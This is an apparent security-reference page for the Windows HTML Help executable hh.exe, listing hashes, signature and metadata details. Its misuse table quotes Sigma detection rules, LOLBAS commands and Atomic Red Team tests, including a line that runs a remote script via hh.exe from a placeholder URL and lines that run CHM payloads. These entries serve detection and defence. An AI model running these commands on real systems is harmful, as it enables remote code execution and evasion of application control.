hh.exe
- File Path:
C:\WINDOWS\hh.exe
- Description: Microsoft HTML Help Executable
Screenshot
Hashes
Type | Hash |
---|---|
MD5 | DF73D52FDCE65F90A2E49EFB5248C77C |
SHA1 | F1452CCF7368531B7ABAC984582E9607A311A9C6 |
SHA256 | 85518D00317A597DC83EE3FB78743538B9444664273BD592DF16603D2C3E4C28 |
SHA384 | 11522296A53A4A645BAB9E8DD91D0298AD4278DB91F64E824ED3E50F2F808D86C4769342C60511CBE115A589ADCDA464 |
SHA512 | AE25AEA1EE10694FA49505D8A8BF63256CBCD6A3ACEEE00627DC5EF717745F140A753BD2A43029C058271E27A20994AB350A87199B059F9D43844B93343823B0 |
SSDEEP | 192:WZ4u9mdac1vr3r9cemMRB/BE06YU/Um5GJ1KDJD/oWcG:WZ45Mc5v9ZZE0TUI1KDWWcG |
Signature
- Status: Signature verified.
- Serial:
330000023241FB59996DCC4DFF000000000232
- Thumbprint:
FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: HH.exe.mui
- Product Name: HTML Help
- Company Name: Microsoft Corporation
- File Version: 10.0.18362.1 (WinBuild.160101.0800)
- Product Version: 10.0.18362.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
File Similarity (ssdeep match)
Possible Misuse
The following table contains possible examples of hh.exe
being misused. While hh.exe
is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | godmode_sigma_rule.yml | - '\hh.exe' |
DRL 1.0 |
sigma | sysmon_suspicious_remote_thread.yml | - '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_hh_chm.yml | title: HH.exe Execution |
DRL 1.0 |
sigma | proc_creation_win_hh_chm.yml | description: Identifies usage of hh.exe executing recently modified .chm files. |
DRL 1.0 |
sigma | proc_creation_win_hh_chm.yml | Image\|endswith: '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_html_help_spawn.yml | ParentImage: 'C:\Windows\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_office_shell.yml | - '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_outlook_shell.yml | - '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\hh.exe' |
DRL 1.0 |
sigma | proc_creation_win_susp_system_user_anomaly.yml | - '\hh.exe' |
DRL 1.0 |
LOLBAS | Hh.yml | Name: Hh.exe |
|
LOLBAS | Hh.yml | - Command: HH.exe http://some.url/script.ps1 |
|
LOLBAS | Hh.yml | - Command: HH.exe c:\windows\system32\calc.exe |
|
LOLBAS | Hh.yml | Usecase: Execute process with HH.exe |
|
LOLBAS | Hh.yml | - Path: C:\Windows\System32\hh.exe |
|
LOLBAS | Hh.yml | - Path: C:\Windows\SysWOW64\hh.exe |
|
atomic-red-team | T1218.001.md | <blockquote>Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program) | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | A custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</blockquote> | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | Uses hh.exe to execute a local compiled HTML Help payload. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | hh.exe #{local_chm_file} | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | Uses hh.exe to execute a remote compiled HTML Help payload. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | hh.exe #{remote_chm_file} | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | | hh_file_path | path of modified HH.exe | Path | $env:windir\hh.exe| | MIT License. © 2018 Red Canary |
MIT License. Copyright (c) 2020-2021 Strontic.